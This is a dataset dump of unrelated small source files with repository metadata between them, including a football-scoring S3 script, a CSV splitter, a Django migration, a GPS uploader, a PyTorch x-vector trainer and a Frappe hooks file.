aws_secret_access_key=AwsSecretAccessKey
)
with open('app/assets/data/code_to.json') as jfile:
teamcodes = json.load(jfile)
content = s3.Object(AwsBucket, 'lastyr.json')
file_content = content.get()['Body'].read().decode('utf-8')
lastszn = json.loads(file_content)['standings']
topSix = lastszn[:6]
newThree = lastszn[17:]
class ScoreMatch:
def __init__(self, data):
self.hGoals = data['score']['fullTime']['homeTeam']
self.aGoals = data['score']['fullTime']['awayTeam']
self.hTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.aTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
if self.hGoals == self.aGoals:
self.draw(data)
else:
self.tally(self.hGoals, self.aGoals)
self.assignTeams(data, self.diff)
self.topSixOrNew(self.wTeam, self.lTeam)
def draw(self, data):
self.wTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
self.wScore = self.lScore = 1
def tally(self, goals1, goals2):
self.diff = goals1-goals2
cs = True if goals1*goals2 == 0 else False
self.wScore = 3 if abs(self.diff) >= 3 else 2
if cs:
self.wScore += 1
self.lScore = -4 if abs(self.diff) >= 3 else -3
def topSixOrNew(self, winner, loser):
if loser in topSix:
self.lScore -= 1
self.wScore += 1
if winner in newThree:
self.wScore += 1
def assignTeams(self, data, diff):
if diff > 0:
self.wTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
else:
self.wTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
scores = {}
for m in response['matches']:
if m['status'] == "FINISHED":
match = ScoreMatch(m)
scores[match.wTeam] = match.wScore
scores[match.lTeam] = match.lScore
scores_json = json.dumps(scores)
filename = 'scores/matchday' + matchday + '.json'
s3.Object(AwsBucket, filename).put(Body=scores_json)
|
[
"[email protected]"
] | |
a2a16481c7b8f3bafa0f35b577b432e7fc6f2adc
|
b4272e8a7863c27644f104c42e1d99c6cd02d8a7
|
/15_printing_CL_arguments.py
|
5e066b025df1f3293dfcde3c98a25165554d2580
|
[] |
no_license
|
skanda9927/year2020
|
613856b7cfa3405f268d930fc4cbdd9897b5709e
|
3745e1caadb4051399505d2cc9e642a930a0c088
|
refs/heads/master
| 2020-12-22T04:15:44.428379 | 2020-01-28T05:50:43 | 2020-01-28T05:50:43 | 236,667,507 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 728 |
py
|
#15.Common line arguments to python: Print count, list them, print the last argument value
#PSEUDOCODE
# Step 1 : import the module named sys
# Step 2 : copy the variables stored in the system built in list argv
# Step 3 : find the length of argument_list using len function and store it nin variable length
# Step 4 : using for loop with length print all values stored in argument_list
import sys
# command line arguments are stored in the form
# of list in sys.argv
argumentList = sys.argv
length = len(argumentList)
for index in range(0,length) :
print (argumentList[index])
|
[
"[email protected]"
] | |
8de04f6692ceeecd098e35ffafb2f1c85e4a9be7
|
cae1c6d385be49c48342733d105fe0ef817b4c02
|
/tajna.py
|
e77b4821e9372ac4094130b880fe3aacda51665e
|
[] |
no_license
|
silvikavcak/pyladies
|
f7c61228b5170dfec7537766abbe97f355d5feb9
|
da46798e76dfffdc1c91961b9b6271256ea48b40
|
refs/heads/main
| 2023-03-19T08:03:12.613500 | 2021-03-05T18:44:40 | 2021-03-05T18:44:40 | 344,892,517 | 0 | 0 | null | 2021-03-05T18:44:41 | 2021-03-05T17:59:45 |
Python
|
UTF-8
|
Python
| false | false | 308 |
py
|
heslo = input("Zadaj heslo a poviem ti tajnostku: ")
if heslo == "susky-susky":
print("Ak sa chytis prstom pravej ruky laveho ucha a pri tom poskaces 3x 50 cm vysoko, do zajtra bude na nebi o hviezdicku viac.")
else:
print("Tajomstvo velkej Arkany ti je zapovedane ty nehodny smrtelny cervik!")
|
[
"[email protected]"
] | |
942bc1da706f608feed237c33fbfea72edac961d
|
59e1df5962e76086bc5d9f88d96115d9a92bcda6
|
/拆分文件.py
|
ad97317632c30db1e6d4aa9383f986bc6d6f131d
|
[] |
no_license
|
jiajinlong0301/ibond_jia
|
484a68b7e3c9ee265824d31e8658448c04aa1d8a
|
8dc6dd90ff68aa2f91359792837d2052e57d8576
|
refs/heads/master
| 2023-01-28T03:11:56.759342 | 2020-12-03T07:28:58 | 2020-12-03T07:28:58 | 313,263,427 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,776 |
py
|
import os
import pandas as pd
# filename为文件路径,file_num为拆分后的文件行数
# 根据是否有表头执行不同程序,默认有表头的
def Data_split(filename,file_num,header=True):
if header:
# 设置每个文件需要有的行数,初始化为1000W
chunksize=10000
data1=pd.read_table(filename,chunksize=chunksize,sep=',',encoding='gbk')
# print(data1)
# num表示总行数
num=0
for chunk in data1:
num+=len(chunk)
# print(num)
# chunksize表示每个文件需要分配到的行数
chunksize=round(num/file_num+1)
# print(chunksize)
# 分离文件名与扩展名os.path.split(filename)
head,tail=os.path.split(filename)
data2=pd.read_table(filename,chunksize=chunksize,sep=',',encoding='gbk')
i=0
for chunk in data2:
chunk.to_csv('{0}_{1}{2}'.format(head,i,tail),header=None,index=False)
print('保存第{0}个数据'.format(i))
i+=1
else:
# 获得每个文件需要的行数
chunksize=10000
data1=pd.read_table(filename,chunksize=chunksize,header=None,sep=',')
num=0
for chunk in data1:
num+=len(chunk)
chunksize=round(num/file_num+1)
head,tail=os.path.split(filename)
data2=pd.read_table(filename,chunksize=chunksize,header=None,sep=',')
i=0
for chunk in data2:
chunk.to_csv('{0}_{1}{2}'.foemat(head,i,tail),header=None,index=False)
print('保存第{0}个数据'.format(i))
i+=1
filename='/Users/jiajinlong/PycharmProjects/zk120000w.csv'
#num为拆分为的文件个数
Data_split(filename,2,header=True)
|
[
"[email protected]"
] | |
7f168e5086d999df72156adf6973e55195c755a1
|
42a41febceba5e1ae9e410a1b07868e4e4955af1
|
/NomticketDjangoAPP/core/migrations/0019_empleado_nombreusuario.py
|
9efce0188efd1b5f211e6eb513cb6315b6e46642
|
[] |
no_license
|
ignacio1985/NomTicket_Django
|
f06fff185a3e15bb7b8d28c9dfa34000c2eb8d37
|
38600a89c4219952f3ff4fbac7b92fc7b00b3920
|
refs/heads/main
| 2023-04-09T07:35:48.448970 | 2021-04-23T03:16:44 | 2021-04-23T03:16:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 484 |
py
|
# Generated by Django 3.1.2 on 2021-04-18 18:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CORE', '0018_auto_20210418_1354'),
]
operations = [
migrations.AddField(
model_name='empleado',
name='nombreUsuario',
field=models.CharField(default=0, max_length=30, unique=True, verbose_name='Nombre de usuario'),
preserve_default=False,
),
]
|
[
"[email protected]"
] | |
3b07e931dae87dcef3d537f0fd4eb5ac052fa0ae
|
00d7e9321d418a2d9a607fb9376b862119f2bd4e
|
/sandbox/launcher_crap.py
|
7024adf4c0e3f981f6383ef806bc67fc73597616
|
[
"MIT"
] |
permissive
|
baluneboy/pims
|
92b9b1f64ed658867186e44b92526867696e1923
|
5a07e02588b1b7c8ebf7458b10e81b8ecf84ad13
|
refs/heads/master
| 2021-11-16T01:55:39.223910 | 2021-08-13T15:19:48 | 2021-08-13T15:19:48 | 33,029,780 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,405 |
py
|
import urwid
palette = [('header', 'white', 'black'),
('reveal focus', 'black', 'dark cyan', 'standout')]
menu = {"121f02, 200Hz": 'do 121f02, 200Hz',
"121f03, 200Hz": 'do 121f03, 200Hz',
"121f04, 200Hz": 'do 121f04, 200Hz'}
items = [urwid.Text(k) for k in menu.keys()]
content = urwid.SimpleListWalker([urwid.AttrMap(w, None, 'reveal focus') for w in items])
listbox = urwid.ListBox(content)
show_key = urwid.Text("Press any key", wrap='clip')
head = urwid.AttrMap(show_key, 'header')
top = urwid.Frame(listbox, head)
def show_all_input(input, raw):
show_key.set_text("Pressed: " + " ".join([
str(i) for i in input]))
return input
def exit_on_cr(input):
if input in ('q', 'Q'):
raise SystemExit
elif input == 'up':
focus_widget, idx = listbox.get_focus()
if idx > 0:
idx = idx-1
listbox.set_focus(idx)
elif input == 'down':
focus_widget, idx = listbox.get_focus()
idx = idx+1
if idx > len(items)-1:
idx = 0
listbox.set_focus(idx)
elif input == 'enter':
raise urwid.ExitMainLoop()
def out(s):
show_key.set_text(str(s))
loop = urwid.MainLoop(top, palette, input_filter=show_all_input, unhandled_input=exit_on_cr)
loop.run()
print(menu[items[listbox.get_focus()[1]].get_text()[0]])
|
[
"[email protected]"
] | |
f352ec7987f6f9addb4cc8a333cc19463e602697
|
5332fef91e044555e605bb37cbef7c4afeaaadb0
|
/hy-data-analysis-with-python-2020/part02-e06_file_count/test/test_file_count.py
|
c7d3f00f44cd8f760c403784983ad6ec08d26a70
|
[] |
no_license
|
nopomi/hy-data-analysis-python-2019
|
f3baa96bbe9b6ee7f0b3e6f6b8b0f3adfc3b6cc8
|
464685cb377cfdeee890a008fbfbd9ed6e3bcfd0
|
refs/heads/master
| 2021-07-10T16:16:56.592448 | 2020-08-16T18:27:38 | 2020-08-16T18:27:38 | 185,044,621 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,560 |
py
|
#!/usr/bin/env python3
import sys
import unittest
from unittest.mock import patch
from itertools import repeat
from tmc import points
from tmc.utils import load, get_out
module_name="src.file_count"
file_count = load(module_name, "file_count")
main = load(module_name, "main")
class FileCount(unittest.TestCase):
@points('p02-06.1')
def test_first(self):
l, w, c = file_count("src/test.txt")
self.assertEqual(l, 8, msg="Wrong number of lines for file 'test.txt'!")
self.assertEqual(w, 105, msg="Wrong number of words for file 'test.txt'!")
self.assertEqual(c, 647, msg="Wrong number of characters for file 'test.txt'!")
@points('p02-06.1')
def test_calls(self):
with patch('builtins.open', side_effect=open) as o:
file_count("src/test.txt")
o.assert_called_once()
@points('p02-06.2')
def test_main(self):
orig_argv = sys.argv
n = 7
sys.argv[1:] = ["file%i" % i for i in range(n)]
with patch('src.file_count.file_count', side_effect=repeat((0,0,0))) as fc:
main()
self.assertEqual(fc.call_count, n,
msg="Wrong number of calls to function 'file_count' for %i command line parameters!" % n)
result = get_out().split('\n')
for i, line in enumerate(result):
self.assertEqual(line.strip(), "0\t0\t0\tfile%i" % i,
msg="Wrong result on line %i!" % i)
sys.argv = orig_argv
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
64acd726fc80f2bd6451b0e36ae4cde1f625e944
|
8c2de4da068ba3ed3ce1adf0a113877385b7783c
|
/hyperion/torch/trainers/xvector_trainer.py
|
190b2a30b1c2f28d38d0c6999040ce4ae6a76f9f
|
[
"Apache-2.0"
] |
permissive
|
hyperion-ml/hyperion
|
a024c718c4552ba3a03aae2c2ca1b8674eaebc76
|
c4c9eee0acab1ba572843373245da12d00dfffaa
|
refs/heads/master
| 2023-08-28T22:28:37.624139 | 2022-03-25T16:28:08 | 2022-03-25T16:28:08 | 175,275,679 | 55 | 20 |
Apache-2.0
| 2023-09-13T15:35:46 | 2019-03-12T18:40:19 |
Python
|
UTF-8
|
Python
| false | false | 5,015 |
py
|
"""
Copyright 2019 Johns Hopkins University (Author: Jesus Villalba)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
import os
from collections import OrderedDict as ODict
import logging
import torch
import torch.nn as nn
from ..utils import MetricAcc
from .torch_trainer import TorchTrainer
class XVectorTrainer(TorchTrainer):
"""Trainer to train x-vector style models.
Attributes:
model: x-Vector model object.
optim: pytorch optimizer object or options dict
epochs: max. number of epochs
exp_path: experiment output path
cur_epoch: current epoch
grad_acc_steps: gradient accumulation steps to simulate larger batch size.
device: cpu/gpu device
metrics: extra metrics to compute besides cxe.
lrsched: learning rate scheduler object or options dict
loggers: LoggerList object, loggers write training progress to std. output and file.
If None, it uses default loggers.
ddp: if True use distributed data parallel training
ddp_type: type of distributed data parallel in (ddp, oss_ddp, oss_shared_ddp)
loss: if None, it uses cross-entropy
train_mode: training mode in ['train', 'ft-full', 'ft-last-layer']
use_amp: uses mixed precision training.
log_interval: number of optim. steps between log outputs
use_tensorboard: use tensorboard logger
use_wandb: use wandb logger
wandb: wandb dictionary of options
grad_clip: norm to clip gradients, if 0 there is no clipping
grad_clip_norm: norm type to clip gradients
swa_start: epoch to start doing swa
swa_lr: SWA learning rate
swa_anneal_epochs: SWA learning rate anneal epochs
cpu_offload: CPU offload of gradients when using fully sharded ddp
"""
def __init__(
self,
model,
optim={},
epochs=100,
exp_path="./train",
cur_epoch=0,
grad_acc_steps=1,
device=None,
metrics=None,
lrsched=None,
loggers=None,
ddp=False,
ddp_type="ddp",
loss=None,
train_mode="train",
use_amp=False,
log_interval=10,
use_tensorboard=False,
use_wandb=False,
wandb={},
grad_clip=0,
grad_clip_norm=2,
swa_start=0,
swa_lr=1e-3,
swa_anneal_epochs=10,
cpu_offload=False,
):
if loss is None:
loss = nn.CrossEntropyLoss()
super().__init__(
model,
loss,
optim,
epochs,
exp_path,
cur_epoch=cur_epoch,
grad_acc_steps=grad_acc_steps,
device=device,
metrics=metrics,
lrsched=lrsched,
loggers=loggers,
ddp=ddp,
ddp_type=ddp_type,
train_mode=train_mode,
use_amp=use_amp,
log_interval=log_interval,
use_tensorboard=use_tensorboard,
use_wandb=use_wandb,
wandb=wandb,
grad_clip=grad_clip,
grad_clip_norm=grad_clip_norm,
swa_start=swa_start,
swa_lr=swa_lr,
swa_anneal_epochs=swa_anneal_epochs,
cpu_offload=cpu_offload,
)
def train_epoch(self, data_loader):
"""Training epoch loop
Args:
data_loader: pytorch data loader returning features and class labels.
"""
self.model.update_loss_margin(self.cur_epoch)
metric_acc = MetricAcc(device=self.device)
batch_metrics = ODict()
self.set_train_mode()
for batch, (data, target) in enumerate(data_loader):
self.loggers.on_batch_begin(batch)
if batch % self.grad_acc_steps == 0:
self.optimizer.zero_grad()
data, target = data.to(self.device), target.to(self.device)
batch_size = data.shape[0]
with self.amp_autocast():
output = self.model(data, target, **self.amp_args)
loss = self.loss(output, target).mean() / self.grad_acc_steps
if self.use_amp:
self.grad_scaler.scale(loss).backward()
else:
loss.backward()
if (batch + 1) % self.grad_acc_steps == 0:
if self.lr_scheduler is not None and not self.in_swa:
self.lr_scheduler.on_opt_step()
self.update_model()
batch_metrics["loss"] = loss.item() * self.grad_acc_steps
for k, metric in self.metrics.items():
batch_metrics[k] = metric(output, target)
metric_acc.update(batch_metrics, batch_size)
logs = metric_acc.metrics
logs["lr"] = self._get_lr()
self.loggers.on_batch_end(logs=logs, batch_size=batch_size)
logs = metric_acc.metrics
logs = ODict(("train_" + k, v) for k, v in logs.items())
logs["lr"] = self._get_lr()
return logs
|
[
"[email protected]"
] | |
aad8fc74a43007757734b635989c1238c35e75a1
|
da8cc1653f8ed4e553fb908a06a5b59e7113d188
|
/migrations/versions/053be705576c_new_fields_in_user_model.py
|
0a3697dbd131f4c0b4597105e4f10b6f8db52417
|
[] |
no_license
|
isaachulvey/tft-companion-app
|
31a6ae4e768f45c17a635188687079754cc8a876
|
ec80fcd0033315e92db78da8cf7575ecca7ad9a2
|
refs/heads/master
| 2022-10-07T05:04:28.935310 | 2020-04-08T18:58:02 | 2020-04-08T18:58:02 | 249,787,351 | 2 | 0 | null | 2022-09-16T18:21:09 | 2020-03-24T18:31:34 |
Python
|
UTF-8
|
Python
| false | false | 792 |
py
|
"""new fields in user model
Revision ID: 053be705576c
Revises: 7546358da6cd
Create Date: 2020-04-07 11:36:58.369264
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '053be705576c'
down_revision = '7546358da6cd'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('about_me', sa.String(length=140), nullable=True))
op.add_column('user', sa.Column('last_seen', sa.DateTime(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'last_seen')
op.drop_column('user', 'about_me')
# ### end Alembic commands ###
|
[
"[email protected]"
] | |
583cccb8c6a66535f378859ee3db2a6dccf5f457
|
c3f3ce2557682a53199a5ff6e8faf988dfa395fa
|
/1 - Introduccion/ejercicio2.py
|
919c9eb7a908c3eb0d7afde5f95470d814441e24
|
[
"MIT"
] |
permissive
|
yang-itimec/Python-basics
|
b6a19cb94882fac917245ec9af2f3eca2bbc25d5
|
52fbe2019619d760d393dbfed96bbd823b9ba698
|
refs/heads/master
| 2020-04-10T17:44:27.691443 | 2018-12-14T14:47:57 | 2018-12-14T14:47:57 | 161,182,531 | 0 | 0 | null | 2018-12-11T15:44:54 | 2018-12-10T13:52:58 |
Python
|
UTF-8
|
Python
| false | false | 954 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 10 16:51:53 2018
@author: PENG YANG YANG
"""
########################
# TEMA 1 - EJERCICIO 2 #
########################
'''
Ejercicios mutaciones, alias y clonaciones
1- Crear una lista con los meses del año (lista1).
2- Crear un alias de la lista (lista2).
3- Clonar la lista (lista3).
4- Añadir a la lista1 “Fin de Año”
5- Mostrar la lista2 y la lista3.
'''
%reset -f
#%% 1- Crear una lista con los meses del año (lista1).
lista1 = ['Enero','Febrero','Marzo','Abril','Mayo','Junio','Julio','Agosto',
'Septiembre','Octubre','Noviembre','Diciembre']
lista1
#%% 2- Crear un alias de la lista (lista2).
lista2 = lista1
lista2
#%% 3- Clonar la lista (lista3).
lista3 = lista1[:]
lista3
#%% 4- Añadir a la lista1 “Fin de Año”
lista1.append('Fin de Año')
lista1
#%% 5- Mostrar la lista2 y la lista3.
print(lista2)
print(lista3)
|
[
"[email protected]"
] | |
1eba989f3c48ca9bd2b7d760fa77a54a3143f1b6
|
39262b161d4d8eb290ed1a013a23a33d45be533b
|
/package/gpsuploader.py
|
eb18c63592ba52d8d5c8d45104bd90f6d19e865d
|
[] |
no_license
|
watermelonharry/socket_func_pyqt
|
be9394105f5cf7c442479c04b0ac18c2a05c3605
|
bedbc5d3946a49eced472fcdea8cc70d727ec0ab
|
refs/heads/master
| 2021-01-16T21:29:17.226298 | 2017-07-27T12:24:22 | 2017-07-27T12:24:22 | 59,997,128 | 1 | 0 | null | 2016-06-04T02:44:53 | 2016-05-30T09:19:47 |
Python
|
UTF-8
|
Python
| false | false | 5,459 |
py
|
# -*- coding:UTF-8 -*-
import time
from PyQt4.QtCore import QThread, QMutex, QMutexLocker
import threading
import requests, os
"""
基于百度鹰眼api:http://lbsyun.baidu.com/index.php?title=yingyan/api/track
"""
##config file path
CONFIG_PATH = '/'.join(os.getcwd().split('\\')) + '/websrc/gps_config.dat'
CONFIG_URL = 'http://api.map.baidu.com/trace/v2/track/addpoint'
def time_to_unix(time_str):
"""
unix时间戳计算
:param time_str: str 'year month day hour minute sec' in decimal
:return: int(UNIX_TIMESTAMP)
"""
try:
s = time.mktime(time.strptime(time_str, '%Y %m %d %H %M %S'))
return int(s)
except Exception as e:
return None
##INPUT: str or int(unix timestamp)
##output: str 'year month day hour minute sec' in decimal
def unix_to_time(unix_str):
try:
dt = time.localtime(int(unix_str))
return str(' '.join([str(i) for i in dt][:6]))
except Exception as e:
return None
def current_unix():
try:
unix_str = int(time.mktime(time.localtime()))
return unix_str
except Exception as e:
return None
#class GpsUploader(threading.Thread):
class GpsUploader(QThread):
GPSMutex = QMutex()
def __init__(self, updateMainSignal = None, recSignal = None, toPickPointSignal = None):
super(GpsUploader, self).__init__()
self.para = {
'ak':None,
'service_id':None,
'latitude':None, #wei du,double,-90.0~90.0
'longitude':None, #jing du,double, -180-180.0
'coord_type':1,
'loc_time':None, #UNIX time stamp
'entity_name':None}
self.get_ak()
self.points = []
self.updateMainSignal = updateMainSignal
self.recSignal = recSignal
self.toPickPointSignal = toPickPointSignal
#point_tuple: (longitude, latitude, unix_time)
#the element type can be str/int/double
def add_point(self, point_tuple):
#get lock
with QMutexLocker(self.GPSMutex):
self.points.append(point_tuple)
#release the lock
def run(self):
# print(self.hello)
# print (self.para)
#get lock
with QMutexLocker(self.GPSMutex):
up_count = 0
del_count = 0
fail_count = 0
# fail_list = []
if len(self.points) != 0:
for point in self.points:
if self.set_point(long= point[0], lat=point[1]):
if self.upload_one_point():
up_count += 1
else:
fail_count += 1
# fail_list.append(point)
else:
del_count +=1
self.points = []
self.update_main(
'enter-func-GpsUploader-run: ' + str(up_count) + ' uploaded, ' + str(fail_count) + ' failed, ' + str(
del_count) + ' deleted.')
#release lock
# self.points = fail_list
#update to mainwindow
def update_main(self, str_arg):
self.updateMainSignal.emit(str_arg)
print(str_arg)
def get_ak(self):
try:
with open(CONFIG_PATH, 'r') as data:
for line in data:
temp = line.split(':')
self.para[temp[0]] = temp[1][:-1]
self.para['loc_time'] = current_unix()
print(self.para)
except Exception as e:
print('error-uploader init failed:', e.message)
def set_point(self,long = None, lat = None, time = current_unix(), coord_type = 1):
if long is None or lat is None:
return False
else:
self.para['longitude'] = long
self.para['latitude'] = lat
self.para['loc_time'] = time
self.para['coord_type'] = coord_type
return True
def upload_one_point(self):
reply = requests.post(CONFIG_URL, data = self.para).json()
if reply['status'] is 0:
return True
else:
return False
# def GtoB(self, G_lon, G_lat):
# """
# GPS坐标转换为百度坐标
# :param G_lon: GPS经度
# :param G_lat: GPS纬度
# :return: (百度经度,百度纬度) 或 None
# """
# try:
# import json
# import base64
# url = 'http://api.map.baidu.com/ag/coord/convert?from=0&to=4&x=%s&y=%s' % (str(G_lon), str(G_lat))
# source_code = requests.get(url)
# plain_text = source_code.text
# c = json.loads(plain_text)
# if c['error'] == 0:
# return (base64.decodestring(c['x']), base64.decodestring(c['y'])) # lat,lon in string type
# else:
# return None
# except Exception as e:
# print('error in GtoB:', e.message)
# return None
if __name__ == '__main__':
test_p = [
('120.13143165691','30.272977524721' ),
('120.13143165690','30.272977524720' ),
('120.13143165689','30.272977524719' ),
('120.13143165688','30.272977524718' ),
('120.13143165687','30.272977524717' ),
]
c = GpsUploader()
for p in test_p:
c.add_point(p)
c.start()
|
[
"[email protected]"
] | |
4b3a9d826820ca989271e40c1f7f39529da12284
|
abe2b440071962ad1f0eaaf34ddfcccafba4b5f8
|
/15_descriptions.py
|
604ea6aea2f8b79fb547797d407d4684c46be0b4
|
[] |
no_license
|
shauseth/converting-bdb-to-48hd
|
f097e253648c9e8d49b539548cb58d5adfb1cb87
|
0c4daba99247d366b0da58b021e8d6a9ec78ae2e
|
refs/heads/master
| 2020-05-18T02:29:28.604783 | 2019-05-21T18:22:05 | 2019-05-21T18:22:05 | 184,116,399 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 671 |
py
|
# SH-I
import pandas as pd
import os
data = pd.read_csv('second-generation-2.csv')
id_list = []
seq_list = []
for filename in os.listdir('.'):
if filename == 'desc.py':
pass
elif filename == 'second-generation-2.csv':
pass
else:
# get IDs
split = filename.split('_')
id = split[0]
id_list.append(int(id))
# get sequences
file = open(filename, 'r')
seq = file.read()
seq_list.append(seq)
file.close()
dict = dict(zip(id_list, seq_list))
data['Sequences'] = data['MimotopeSetID'].map(dict)
print(data)
data.to_csv('second-generation-3.csv', index = False)
|
[
"[email protected]"
] | |
775b26f16fa53c27ec712bf92cfb31553c92f19d
|
e24511af0fdf299130fdf1e27b7eda1e35064e7c
|
/app/coupon/apps.py
|
bab96066b77b4592b0cf454c6ef51fa085d53a67
|
[] |
no_license
|
amitbhalla/lms
|
623dc6764dba5ee67a7f30d3882b7917b6441c2e
|
0810a875008b371a7bd3996742ad3b04ce037b14
|
refs/heads/main
| 2023-07-19T12:12:40.570958 | 2021-09-17T16:55:29 | 2021-09-17T16:55:29 | 405,055,595 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 144 |
py
|
from django.apps import AppConfig
class CouponConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "coupon"
|
[
"[email protected]"
] | |
0340fad6844580f9a0ff3797769971efcc2f644a
|
52a4d869976a97498bdf56a8d0ff92cac138a136
|
/Bioinformatics Textbook Track/Chapter 1/rosalind_ba1d.py
|
4e6d4b0953bb2d76fa147c0368a4f8c3ded360aa
|
[] |
no_license
|
aakibinesar/Rosalind
|
d726369a787d848cc378976b886189978a60a3a5
|
375bbdbfb16bf11b2f980701bbd0ba74a1605cdb
|
refs/heads/master
| 2022-08-18T09:36:00.941080 | 2020-05-24T18:49:38 | 2020-05-24T18:49:38 | 264,722,651 | 0 | 0 | null | 2020-05-17T17:51:03 | 2020-05-17T17:40:59 | null |
UTF-8
|
Python
| false | false | 747 |
py
|
def occurrences(genome, sub):
"""
:param genome: genome for processing
:param sub: pattern for which we find indexes of occurnces
:return: list of indexes
"""
start = 0
indexes = []
while True:
start = genome.find(sub, start)
if start > 0:
indexes.append(start)
else:
break
start += 1
return indexes
def read_data_from(file_name):
with open(file_name, "r") as file:
pattern = file.readline().strip()
genome = file.readline().strip()
return genome, pattern
if __name__ == "__main__":
genome, pattern = read_data_from("rosalind_ba1d.txt")
indexes = occurrences(genome, pattern)
for ind in indexes:
print ind,
|
[
"[email protected]"
] | |
488814efa60cb7ab1632ed5a4b887fa663a17a55
|
3a6235a79585ed60da42ae6bd69d140c80a5ac4a
|
/Week_01/加1.py
|
06b05dff7e9e38a989632355c6b053e0a9ec6136
|
[] |
no_license
|
Jackson026/AlgorithmQIUZHAO
|
dea6c58d972bc5039e392a16676ad1d60398e1a8
|
09feae0783c8d21bf1b9aaad7fa6917f05ff7162
|
refs/heads/master
| 2022-12-16T23:40:42.151486 | 2020-09-02T07:14:21 | 2020-09-02T07:14:21 | 279,640,530 | 1 | 0 | null | 2020-07-14T16:41:36 | 2020-07-14T16:41:35 | null |
UTF-8
|
Python
| false | false | 650 |
py
|
# 取巧的办法是转换成字符串然后变为int,最后再转换回去原来的形式,通用性不强,就不作为一种方法写在这里
# 按位运算,倒序,如果是9,就变为0,向前循环,不为9则直接加1;
# 如果为999这种特殊形式,则在循环结束后,列表头插入1 .insert(位置,数)
def plusOne(self, digits):
if not digits:
return digits + [1]
for i in range(len(digits) - 1, -1, -1):
if digits[i] == 9:
digits[i] = 0
else:
digits[i] = digits[i] + 1
break
if digits[0] == 0:
digits.insert(0, 1)
return digits
|
[
"[email protected]"
] | |
152edf169d78c30351a491fd1d68dccb08de71c1
|
a9ee8b29cc753cbcf3167e2741c779ad43ab22a3
|
/api/wsgi.py
|
6a23d3e1ea9a1a6b3e64ad17e9afb8029d5cf9b3
|
[
"MIT"
] |
permissive
|
josecolinapy/fifa-21-api
|
f76f06679be9f696f03ce0f3e6e5be5fc5c4c0f4
|
5ed75b60a8c302ad7d4fde04a07312de18c10b1e
|
refs/heads/main
| 2023-03-18T17:03:31.483890 | 2021-03-14T15:04:56 | 2021-03-14T15:04:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 388 |
py
|
"""
WSGI config for api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
374b46162c7dde768082c279d494fa3a42728b61
|
ff623c438f0089cf23cdb089fde693e340882164
|
/metabase_ngse/hooks.py
|
27e6dd5cb62016922011c60514f74400182b1747
|
[
"MIT"
] |
permissive
|
Suraj787/metabase_ngse
|
eb1de77ff4e86685db0f2f98bb2a8376b5cd654a
|
be626804148650af73bb00926ed9052201274c04
|
refs/heads/master
| 2023-01-04T12:30:51.092201 | 2020-10-31T20:47:27 | 2020-10-31T20:47:27 | 308,969,125 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,154 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
app_name = "metabase_ngse"
app_title = "Metabase Ngse"
app_publisher = "firsterp"
app_description = "Metabase for Nandan GSE"
app_icon = "octicon octicon-file-directory"
app_color = "grey"
app_email = "[email protected]"
app_license = "MIT"
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/metabase_ngse/css/metabase_ngse.css"
# app_include_js = "/assets/metabase_ngse/js/metabase_ngse.js"
# include js, css files in header of web template
# web_include_css = "/assets/metabase_ngse/css/metabase_ngse.css"
# web_include_js = "/assets/metabase_ngse/js/metabase_ngse.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "metabase_ngse.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "metabase_ngse.install.before_install"
# after_install = "metabase_ngse.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "metabase_ngse.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
# doc_events = {
# "*": {
# "on_update": "method",
# "on_cancel": "method",
# "on_trash": "method"
# }
# }
# Scheduled Tasks
# ---------------
# scheduler_events = {
# "all": [
